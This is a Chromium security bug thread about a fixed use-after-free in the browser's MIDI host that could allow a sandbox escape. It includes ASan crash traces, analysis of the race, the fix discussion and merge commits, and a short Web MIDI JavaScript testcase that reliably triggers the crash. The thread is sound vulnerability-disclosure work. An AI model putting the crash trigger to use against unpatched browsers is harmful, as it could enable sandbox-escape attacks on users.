Starred by 3 users
Status: Fixed
Owner:
Closed: Dec 2015
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux, Chrome, Mac
Pri: 0
Type: Bug-Security



Security: UAF in MidiHost (Sandbox escape)
Reported by och...@chromium.org (Project Member), Dec 2 2015
Renderer patch attached. Consistently repros on my machine, but there is a race that must be won.

In MidiManagerAlsa::DispatchSendMidiData (can be called from IPC), there is a 

  // Acknowledge send.
  send_thread_.message_loop()->PostTask(
      FROM_HERE, base::Bind(&MidiManagerClient::AccumulateMidiBytesSent,
                            base::Unretained(client), data.size()));

|client| is a MidiHost, which is both a MidiManagerClient and a BrowserMessageFilter for a particular renderer process. |send_thread_| is a thread that belongs to MidiManagerAlsa, which is owned by BrowserMainLoop, independent of any renderers. This means that it’s possible for |client| to be freed (it’s not retained) when the corresponding RenderProcessHostImpl dies while these tasks are still in the message loop.

If the race is won (i.e. the MidiHost gets freed before the task fires), we get a virtual call into MidiManagerClient::AccumulateMidiBytesSent on a freed |this|.

ASan report:

==7760==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110001f4040 at pc 0x7f96d4b66d0a bp 0x7f96957f6a60 sp 0x7f96957f6a58
READ of size 8 at 0x6110001f4040 thread T20 (Chrome_IOThread)
    #0 0x7f96d4b66d09 in Run base/bind_internal.h:178:12
    #1 0x7f96d4b66bb2 in MakeItSo base/bind_internal.h:295:5
    #2 0x7f96d4b6698c in Run base/bind_internal.h:345:12
    #3 0x7f96c9a26ec3 in Run base/callback.h:396:12
    #4 0x7f96c9a96c95 in RunTask base/debug/task_annotator.cc:51:3
    #5 0x7f96c9be9247 in RunTask base/message_loop/message_loop.cc:482:3
    #6 0x7f96c9bea459 in DeferOrRunPendingTask base/message_loop/message_loop.cc:491:5
    #7 0x7f96c9beb4c7 in DoWork base/message_loop/message_loop.cc:603:13
    #8 0x7f96c99e276b in Run base/message_loop/message_pump_libevent.cc:237:21
    #9 0x7f96c9be841e in RunHandler base/message_loop/message_loop.cc:446:3
    #10 0x7f96c9ce2d34 in Run base/run_loop.cc:55:3
    #11 0x7f96c9be3cbf in Run base/message_loop/message_loop.cc:289:3
    #12 0x7f96c9e39568 in Run base/threading/thread.cc:199:3
    #13 0x7f96d50992fa in IOThreadRun content/browser/browser_thread_impl.cc:211:3
    #14 0x7f96d50996c9 in Run content/browser/browser_thread_impl.cc:246:14
    #15 0x7f96c9e39e89 in ThreadMain base/threading/thread.cc:251:3
    #16 0x7f96c9dfd4ae in ThreadFunc base/threading/platform_thread_posix.cc:64:3
    #17 0x7f96c1fcd181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312:0

0x6110001f4040 is located 0 bytes inside of 256-byte region [0x6110001f4040,0x6110001f4140)
freed by thread T20 (Chrome_IOThread) here:
    #0 0x7f96e1bee77b in operator delete(void*) ??:?
    #1 0x7f96d5fe5ff1 in ~MidiHost content/browser/media/midi_host.cc:62:23
    #2 0x7f96d5fe619f in Destruct<content::MidiHost> content/public/browser/browser_thread.h:257:9
    #3 0x7f96d5fe6034 in OnDestruct content/browser/media/midi_host.cc:69:3
    #4 0x7f96d4b657ed in Destruct content/public/browser/browser_message_filter.h:135:5
    #5 0x7f96d4b6576b in Release base/memory/ref_counted.h:184:7
    #6 0x7f96d4b65728 in Release base/memory/ref_counted.h:403:3
    #7 0x7f96d4b65708 in ~scoped_refptr base/memory/ref_counted.h:298:7
    #8 0x7f96d4b66684 in ~MaybeScopedRefPtr base/bind_helpers.h:439:8
    #9 0x7f96d4b66668 in ~BindState base/bind_internal.h:414:17
    #10 0x7f96d4b665c6 in Destroy base/bind_internal.h:417:5
    #11 0x7f96c9a3c003 in Release base/callback_internal.cc:18:5
    #12 0x7f96c9a3c864 in Release base/memory/ref_counted.h:403:3
    #13 0x7f96c9a3c5e8 in ~scoped_refptr base/memory/ref_counted.h:298:7
    #14 0x7f96c9a3c574 in ~CallbackBase base/callback_internal.cc:43:1
    #15 0x7f96c9a15d24 in ~Callback base/callback_forward.h:11:7
    #16 0x7f96c9c6bb12 in ~PendingTask base/pending_task.cc:34:1
    #17 0x7f96c9beb505 in DoWork base/message_loop/message_loop.cc:606:5
    #18 0x7f96c99e276b in Run base/message_loop/message_pump_libevent.cc:237:21
    #19 0x7f96c9be841e in RunHandler base/message_loop/message_loop.cc:446:3
    #20 0x7f96c9ce2d34 in Run base/run_loop.cc:55:3
    #21 0x7f96c9be3cbf in Run base/message_loop/message_loop.cc:289:3
    #22 0x7f96c9e39568 in Run base/threading/thread.cc:199:3
    #23 0x7f96d50992fa in IOThreadRun content/browser/browser_thread_impl.cc:211:3
    #24 0x7f96d50996c9 in Run content/browser/browser_thread_impl.cc:246:14
    #25 0x7f96c9e39e89 in ThreadMain base/threading/thread.cc:251:3
    #26 0x7f96c9dfd4ae in ThreadFunc base/threading/platform_thread_posix.cc:64:3
    #27 0x7f96c1fcd181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312:0

previously allocated by thread T0 (chrome) here:
    #0 0x7f96e1bee1bb in operator new(unsigned long) ??:?
    #1 0x7f96d64c566d in CreateMessageFilters content/browser/renderer_host/render_process_host_impl.cc:876:7
    #2 0x7f96d64c2be9 in Init content/browser/renderer_host/render_process_host_impl.cc:699:3
    #3 0x7f96d586282b in CreatePendingRenderFrameHost content/browser/frame_host/render_frame_host_manager.cc:1641:8
    #4 0x7f96d584db12 in UpdateStateForNavigate content/browser/frame_host/render_frame_host_manager.cc:2393:5
    #5 0x7f96d584c264 in Navigate content/browser/frame_host/render_frame_host_manager.cc:388:49
    #6 0x7f96d57ac4b5 in NavigateToEntry content/browser/frame_host/navigator_impl.cc:314:7
    #7 0x7f96d57aeac0 in NavigateToPendingEntry content/browser/frame_host/navigator_impl.cc:391:10
    #8 0x7f96d57415c9 in NavigateToPendingEntryInternal content/browser/frame_host/navigation_controller_impl.cc:1796:12
    #9 0x7f96d5728911 in NavigateToPendingEntry content/browser/frame_host/navigation_controller_impl.cc:1773:18
    #10 0x7f96d5729439 in LoadEntry content/browser/frame_host/navigation_controller_impl.cc:441:3
    #11 0x7f96d572f0cf in LoadURLWithParams content/browser/frame_host/navigation_controller_impl.cc:806:3
    #12 0x7f96e54d98ef in LoadURLInContents chrome/browser/ui/browser_navigator.cc:290:3
    #13 0x7f96e54d4760 in Navigate chrome/browser/ui/browser_navigator.cc:547:9
    #14 0x7f96e5591fd4 in OpenTabsInBrowser chrome/browser/ui/startup/startup_browser_creator_impl.cc:774:5
    #15 0x7f96e558d0bb in ProcessSpecifiedURLs chrome/browser/ui/startup/startup_browser_creator_impl.cc:693:22
    #16 0x7f96e558b411 in ProcessStartupURLs chrome/browser/ui/startup/startup_browser_creator_impl.cc:629:22
    #17 0x7f96e55887ef in ProcessLaunchURLs chrome/browser/ui/startup/startup_browser_creator_impl.cc:515:26
    #18 0x7f96e5586bfb in Launch chrome/browser/ui/startup/startup_browser_creator_impl.cc:348:5
    #19 0x7f96e55763ac in LaunchBrowser chrome/browser/ui/startup/startup_browser_creator.cc:383:27
    #20 0x7f96e557581c in ProcessCmdLineImpl chrome/browser/ui/startup/startup_browser_creator.cc:833:12
    #21 0x7f96e5571820 in Start chrome/browser/ui/startup/startup_browser_creator.cc:327:10
    #22 0x7f96e30233b0 in PreMainMessageLoopRunImpl chrome/browser/chrome_browser_main.cc:1694:24
    #23 0x7f96e301f9fe in PreMainMessageLoopRun chrome/browser/chrome_browser_main.cc:1122:18
    #24 0x7f96d504297c in PreMainMessageLoopRun content/browser/browser_main_loop.cc:943:5
    #25 0x7f96d5051fba in Run base/bind_internal.h:178:12
    #26 0x7f96d5051cce in MakeItSo base/bind_internal.h:288:12
    #27 0x7f96d5051a99 in Run base/bind_internal.h:345:12
    #28 0x7f96d6037cb3 in Run base/callback.h:396:12
    #29 0x7f96d6bc0585 in RunAllTasksNow content/browser/startup_task_runner.cc:45:14

Thread T20 (Chrome_IOThread) created by T0 (chrome) here:
    #0 0x7f96e1bae1d9 in __interceptor_pthread_create ??:?
    #1 0x7f96c9dfc5f5 in CreateThread base/threading/platform_thread_posix.cc:103:13
    #2 0x7f96c9dfc1e2 in CreateWithPriority base/threading/platform_thread_posix.cc:184:10
    #3 0x7f96c9e388f4 in StartWithOptions base/threading/thread.cc:113:10
    #4 0x7f96d509a0d8 in StartWithOptions content/browser/browser_thread_impl.cc:301:10
    #5 0x7f96d503f0f6 in CreateThreads content/browser/browser_main_loop.cc:912:12
    #6 0x7f96d5051fba in Run base/bind_internal.h:178:12
    #7 0x7f96d5051cce in MakeItSo base/bind_internal.h:288:12
    #8 0x7f96d5051a99 in Run base/bind_internal.h:345:12
    #9 0x7f96d6037cb3 in Run base/callback.h:396:12
    #10 0x7f96d6bc0585 in RunAllTasksNow content/browser/startup_task_runner.cc:45:14
    #11 0x7f96d503d335 in CreateStartupTasks content/browser/browser_main_loop.cc:821:3
    #12 0x7f96d5057eeb in Initialize content/browser/browser_main_runner.cc:220:5
    #13 0x7f96d5032faa in BrowserMain content/browser/browser_main.cc:40:19
    #14 0x7f96d4b4a28b in RunNamedProcessTypeMain content/app/content_main_runner.cc:378:14
    #15 0x7f96d4b4ebae in Run content/app/content_main_runner.cc:786:12
    #16 0x7f96d4b47677 in ContentMain content/app/content_main.cc:19:15
    #17 0x7f96e1bf0330 in ChromeMain chrome/app/chrome_main.cc:66:12
    #18 0x7f96e1bf0121 in main chrome/app/chrome_exe_main_aura.cc:17:10
    #19 0x7f96bda9aec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287:0

SUMMARY: AddressSanitizer: heap-use-after-free (/mnt/ssd/chromium/src/out/Release/lib/libcontent.so+0xc31d09)
Shadow bytes around the buggy address:
  0x0c22800367b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c22800367c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800367d0: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c22800367e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800367f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
=>0x0c2280036800: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x0c2280036810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280036820: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c2280036830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280036840: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c2280036850: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7760==ABORTING
 
Attachment: renderer.patch (1.2 KB)
Cc: project-zero@google.com
I'm assuming this can be reached in ChromeOS as well, please correct me if I'm wrong.

Note that in MidiHost::OnSendData, there is this check:

    if (output_port_count_ <= port) {
      bad_message::ReceivedBadMessage(this, bad_message::MH_INVALID_MIDI_PORT);
      return;
    }

On my Linux (corp) workstation, however, output_port_count_ appears to be 1 by default.
Labels: -OS-Chrome
Remove OS-Chrome so that sheriffbot is able to work on the bug.
Taking another look, it looks like there are other platform specific implementations that may be vulnerable. In particular, the Mac implementation:

https://code.google.com/p/chromium/codesearch#chromium/src/media/midi/midi_manager_mac.cc

void MidiManagerMac::DispatchSendMidiData(MidiManagerClient* client,
                                          uint32 port_index,
                                          const std::vector<uint8>& data,
                                          double timestamp) {
  RunOnClientThread(
      base::Bind(&MidiManagerMac::SendMidiData,
                 base::Unretained(this), client, port_index, data, timestamp));
}

and...

void MidiManagerMac::SendMidiData(MidiManagerClient* client,
                                  uint32 port_index,
                                  const std::vector<uint8>& data,
                                  double timestamp) {
  ...
  ...
  client->AccumulateMidiBytesSent(data.size());
}

The Usb/Android implementations go through MidiScheduler::InvokeClosure and MidiManager::AccumulateMidiBytesSent, which checks for the existence of |client| in |MidiManager::clients_| before calling |AccumulateMidiBytesSent|, so they look safe to me:

void MidiManager::AccumulateMidiBytesSent(MidiManagerClient* client, size_t n) {
  {
    base::AutoLock auto_lock(lock_);
    if (clients_.find(client) == clients_.end())
      return;
  }
  client->AccumulateMidiBytesSent(n);
}

The Win implementation doesn't call client->AccumulateMidiBytesSent on a different thread, so it looks safe too.
Labels: Pri-1 Security_Impact-Stable Security_Severity-High M-48
Owner: agoode@chromium.org
Status: Assigned
Labels: Cr-Internals-Media
Cc: toyoshim@chromium.org
toyoshim did the original implementation of this (and the Mac version). I rewrote most of it, but I think kept the original thread behavior.
Yes, this is the code used by Linux and Chrome OS.
Hmm... Let me see the Mac port.
Adam, can you find time to look at the ALSA port?
I will look at ALSA, but can't do it this week. Monday for sure.
It appears that this might actually be a critical severity bug instead. I've managed to hit this same bug without a compromised renderer (simply by calling JS apis). Seeing if I can come up with a reliable repro...
Labels: -Pri-1 -Security_Severity-High Pri-0 Security_Severity-Critical
Here's a (JS) repro that consistently gives the same UAF report on my ASan build. Raising severity to critical.

agoode, toyoshim, could you please make this a priority?
Attachment: haq.html (610 bytes)
Note that the above repro relies on haq.html being opened directly (e.g. from a <a target="_blank" href="haq.html"). Otherwise self.close() will not work.
Project Member Comment 14 by clusterf...@chromium.org, Dec 4 2015
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000e4b40
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95DRFjFZrvbDxp-R1h2yZOpNnKyYZ4ZTPR5Et8zhuqTzP59HkH-j8RF1PrERgb94zeFoU2OJN3VDG_bIGDy1qiU7xwsNQf2Q-XFAY5UvjBvp3cyzf-0YoaIrLv_WtPDWbZWxio5dJQfxm1p4d_qvHJKgHW-mg


Filer: ochang

See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
Project Member Comment 15 by clusterf...@chromium.org, Dec 4 2015
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000f1740
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=320471:320682

Minimized Testcase (0.36 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972d8_JS3OZdxFrTxxBHt10xsbZLMoZI1cAdFyOmO-c1X_9qATcjlF4MoxD49VGOm2eQ6DgRRcwB1pEk7rSg6--VVPiPcPQRObcThE3dFXp3HqB1sPposEQbqOeCR16aQmnz2LBJx51RIhSmVC28t22V1QPXg
<script>
navigator.requestMIDIAccess().then(onMIDISuccess);
function onMIDISuccess(midi) {
  outputs = midi.outputs;
  var size = 10 * 1024 * 1024;
  var hello = new Uint8Array(size);
  for (var i = 0; i < size; i++) {
    hello[i] = 0xf8;
  }
  outputs.forEach(function(port) {
    port.send(hello);
    self.close();
  });
}
function onMIDIFailure() {
}
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
Yes, I will have time to examine tonight.
Status: Started
I have a fix that calls MidiManager::AccumulateMidiBytesSent instead of MidiClient::AccumulateMidiBytesSent:

  // Acknowledge send.
  send_thread_.message_loop()->PostTask(
      FROM_HERE, base::Bind(&MidiManagerAlsa::AccumulateMidiBytesSent,
                            base::Unretained(this), base::Unretained(client),
                            data.size()));


But I wonder if that is sufficient:

void MidiManager::AccumulateMidiBytesSent(MidiManagerClient* client, size_t n) {
  {
    base::AutoLock auto_lock(lock_);
    if (clients_.find(client) == clients_.end())
      return;
  }
  client->AccumulateMidiBytesSent(n);
}

Why is the lock released before the client is used? I think we still have a race because the destruction occurs on the IO thread:

void MidiManager::EndSession(MidiManagerClient* client) {
  ReportUsage(Usage::SESSION_ENDED);

  // At this point, |client| can be in the destruction process, and calling
  // any method of |client| is dangerous.
  base::AutoLock auto_lock(lock_);
  clients_.erase(client);
  pending_clients_.erase(client);
}

MidiHost::~MidiHost() {
  // Close an open session, or abort opening a session.
  if (is_session_requested_ && midi_manager_)
    midi_manager_->EndSession(this);
}

void MidiHost::OnDestruct() const {
  BrowserThread::DeleteOnIOThread::Destruct(this);
}
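As an added illustration (not Chromium code), the following is a minimal C++ model of the relationship discussed in the comment above: a manager with a clients_ set guarded by lock_, a host that unregisters itself in its destructor, and a queued ack that either holds a raw client pointer or is routed through a membership check first. Client, Manager and Host are hypothetical stand-ins for MidiManagerClient, MidiManager and MidiHost, and the queue stands in for send_thread_'s message loop.

```cpp
#include <cstddef>
#include <functional>
#include <memory>
#include <mutex>
#include <set>
#include <vector>
// Hypothetical stand-ins for MidiManagerClient, MidiManager and MidiHost.
class Client {
 public:
  virtual ~Client() = default;
  virtual void AccumulateMidiBytesSent(size_t n) = 0;
};

class Manager {
 public:
  void StartSession(Client* c) { std::lock_guard<std::mutex> g(lock_); clients_.insert(c); }
  // Called from the client's destructor, like MidiManager::EndSession.
  void EndSession(Client* c) { std::lock_guard<std::mutex> g(lock_); clients_.erase(c); }

  // Before: the queued ack holds a raw pointer (base::Unretained(client)). If the
  // client is destroyed before the task runs, the virtual call is made on freed
  // memory; that is the ASan report at the top of this bug.
  void PostUnretainedAck(Client* client, size_t n) {
    pending_.push_back([client, n] { client->AccumulateMidiBytesSent(n); return true; });
  }

  // After: the ack goes through the manager, which checks membership under lock_
  // first (as MidiManager::AccumulateMidiBytesSent does); a client that already
  // ran EndSession is skipped. lock_ is released before the call, so a concurrent
  // EndSession between the check and the call is the window the thread asks about.
  void PostGuardedAck(Client* client, size_t n) {
    pending_.push_back([this, client, n] {
      {
        std::lock_guard<std::mutex> g(lock_);
        if (clients_.find(client) == clients_.end())
          return false;
      }
      client->AccumulateMidiBytesSent(n);
      return true;
    });
  }

  // Drains the queue in place of send_thread_'s message loop; returns how many
  // acks reached a live client.
  int RunPending() {
    int delivered = 0;
    for (auto& task : pending_) delivered += task() ? 1 : 0;
    pending_.clear();
    return delivered;
  }

 private:
  std::mutex lock_;
  std::set<Client*> clients_;
  std::vector<std::function<bool()>> pending_;
};

class Host : public Client {
 public:
  explicit Host(Manager* m) : manager_(m) { manager_->StartSession(this); }
  ~Host() override { manager_->EndSession(this); }  // like MidiHost::~MidiHost
  void AccumulateMidiBytesSent(size_t n) override { bytes_sent_ += n; }
  size_t bytes_sent() const { return bytes_sent_; }
 private:
  Manager* manager_;
  size_t bytes_sent_ = 0;
};

// The renderer goes away (self.close()) while its ack is still queued.
int GuardedAckAfterHostDestroyed() {
  Manager manager;
  std::unique_ptr<Host> host(new Host(&manager));
  manager.PostGuardedAck(host.get(), 10 * 1024 * 1024);
  host.reset();                 // frees the client before the task fires
  return manager.RunPending();  // 0: the stale ack is dropped, not dereferenced
}

size_t AckWithLiveHost(bool guarded) {  // host still alive: both variants deliver
  Manager manager;
  Host host(&manager);
  if (guarded) manager.PostGuardedAck(&host, 3); else manager.PostUnretainedAck(&host, 3);
  manager.RunPending();
  return host.bytes_sent();     // 3
}
```

The unretained variant is only exercised with a live host here; with a destroyed host it would dereference freed memory exactly as the report above shows.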

Thanks for working on this! Let's discuss this on the CL.
Project Member Comment 20 by bugdroid1@chromium.org, Dec 7 2015
Should we plan on merging back to stable?
Let's get the Mac fix checked in first too (submitted a patch), and then do both merges?
Project Member Comment 23 by bugdroid1@chromium.org, Dec 8 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4

commit 54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4
Author: ochang <ochang@chromium.org>
Date: Tue Dec 08 02:36:08 2015

Fix a potential crash in MidiManagerMac.

R=toyoshim@chromium.org,agoode@chromium.org
BUG= 564501 

Review URL: https://codereview.chromium.org/1508563003

Cr-Commit-Position: refs/heads/master@{#363714}

[modify] http://crrev.com/54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4/media/midi/midi_manager_mac.cc

Project Member Comment 24 by clusterf...@chromium.org, Dec 8 2015
ClusterFuzz has detected this issue as fixed in range 363393:363449.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000f1740
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=320471:320682
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=363393:363449


If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
Project Member Comment 25 by bugdroid1@chromium.org, Dec 8 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/5e766f50703e98ea6c25ea630993047f3deed31d

commit 5e766f50703e98ea6c25ea630993047f3deed31d
Author: agoode <agoode@chromium.org>
Date: Tue Dec 08 03:45:54 2015

Add comment about lock_ in MidiManager::AccumulateMidiBytesSent

BUG= 564501 

Review URL: https://codereview.chromium.org/1503213002

Cr-Commit-Position: refs/heads/master@{#363721}

[modify] http://crrev.com/5e766f50703e98ea6c25ea630993047f3deed31d/media/midi/midi_manager.cc

Project Member Comment 26 by clusterf...@chromium.org, Dec 8 2015
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Labels: Merge-Request-47 Merge-Request-48
Status: Fixed
Requesting merges for 47 and 48.
Project Member Comment 28 by clusterf...@chromium.org, Dec 8 2015
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Comment 29 by tin...@google.com, Dec 9 2015
Labels: -Merge-Request-48 Merge-Approved-48
Merge approved for M48 (branch 2564). Pls merge in.
Project Member Comment 30 by bugdroid1@chromium.org, Dec 9 2015
Labels: -Merge-Approved-48 merge-merged-2564
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/f707b29a60ea179f604d0a39287e12a2930579e3

commit f707b29a60ea179f604d0a39287e12a2930579e3
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:18:19 2015

Fix crash with MIDI send for MidiManagerAlsa

BUG= 564501 

Review URL: https://codereview.chromium.org/1500153002

Cr-Commit-Position: refs/heads/master@{#363413}
(cherry picked from commit a3d22f60a719a6dae77a0586ef32dd12ac463952)

Review URL: https://codereview.chromium.org/1509313002 .

Cr-Commit-Position: refs/branch-heads/2564@{#277}
Cr-Branched-From: 1283eca15bd9f772387f75241576cde7bdec7f54-refs/heads/master@{#359700}

[modify] http://crrev.com/f707b29a60ea179f604d0a39287e12a2930579e3/media/midi/midi_manager.cc
[modify] http://crrev.com/f707b29a60ea179f604d0a39287e12a2930579e3/media/midi/midi_manager_alsa.cc

Project Member Comment 31 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/255563d75cf0d2cade139168bc77b706a19d2674

commit 255563d75cf0d2cade139168bc77b706a19d2674
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:21:22 2015

Fix a potential crash in MidiManagerMac.

R=toyoshim@chromium.org,agoode@chromium.org
BUG= 564501 

Review URL: https://codereview.chromium.org/1508563003

Cr-Commit-Position: refs/heads/master@{#363714}
(cherry picked from commit 54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4)

Review URL: https://codereview.chromium.org/1509953003 .

Cr-Commit-Position: refs/branch-heads/2564@{#278}
Cr-Branched-From: 1283eca15bd9f772387f75241576cde7bdec7f54-refs/heads/master@{#359700}

[modify] http://crrev.com/255563d75cf0d2cade139168bc77b706a19d2674/media/midi/midi_manager_mac.cc

I opened issue #567920 for implementing a MIDI sandbox.
Project Member Comment 33 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chrome-internal.googlesource.com/bling/chromium.git/+/f707b29a60ea179f604d0a39287e12a2930579e3

commit f707b29a60ea179f604d0a39287e12a2930579e3
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:18:19 2015

Project Member Comment 34 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chrome-internal.googlesource.com/bling/chromium.git/+/255563d75cf0d2cade139168bc77b706a19d2674

commit 255563d75cf0d2cade139168bc77b706a19d2674
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:21:22 2015

Comment 35 by tin...@google.com, Dec 9 2015
The fix is in 48.0.2564.41, pls verify as appropriate.
Labels: -Merge-Request-47 Merge-Approved-47
Merge approved for M47 (branch 2526)
Project Member Comment 37 by bugdroid1@chromium.org, Dec 9 2015
Labels: -Merge-Approved-47 merge-merged-2526
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/6527ea243e8684bad59cceee16389b219ec03c52

commit 6527ea243e8684bad59cceee16389b219ec03c52
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 18:43:30 2015

Fix crash with MIDI send for MidiManagerAlsa

BUG= 564501 

Review URL: https://codereview.chromium.org/1500153002

Cr-Commit-Position: refs/heads/master@{#363413}
(cherry picked from commit a3d22f60a719a6dae77a0586ef32dd12ac463952)

Review URL: https://codereview.chromium.org/1510313002 .

Cr-Commit-Position: refs/branch-heads/2526@{#518}
Cr-Branched-From: cb947c0153db0ec02a8abbcb3ca086d88bf6006f-refs/heads/master@{#352221}

[modify] http://crrev.com/6527ea243e8684bad59cceee16389b219ec03c52/media/midi/midi_manager.cc
[modify] http://crrev.com/6527ea243e8684bad59cceee16389b219ec03c52/media/midi/midi_manager_alsa.cc

Project Member Comment 38 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/7a3785cab4bc23accf2a7d7e0394c7d388903eb1

commit 7a3785cab4bc23accf2a7d7e0394c7d388903eb1
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 18:48:11 2015

Fix a potential crash in MidiManagerMac.

R=toyoshim@chromium.org,agoode@chromium.org
BUG= 564501 

Review URL: https://codereview.chromium.org/1508563003

Cr-Commit-Position: refs/heads/master@{#363714}
(cherry picked from commit 54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4)

Review URL: https://codereview.chromium.org/1515673002 .

Cr-Commit-Position: refs/branch-heads/2526@{#519}
Cr-Branched-From: cb947c0153db0ec02a8abbcb3ca086d88bf6006f-refs/heads/master@{#352221}

[modify] http://crrev.com/7a3785cab4bc23accf2a7d7e0394c7d388903eb1/media/midi/midi_manager_mac.cc

Cc: infe...@chromium.org
Labels: OS-Chrome OS-Mac
Labels: Release-2-M47
Cc: palmer@chromium.org
Project Member Comment 42 by sheriffbot@chromium.org, Mar 15 2016
Labels: -Restrict-View-SecurityNotify
This security bug has been closed for more than 14 weeks. Removing view restrictions.

For more details visit https://sites.google.com/a/chromium.org/dev/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 43 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 44 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic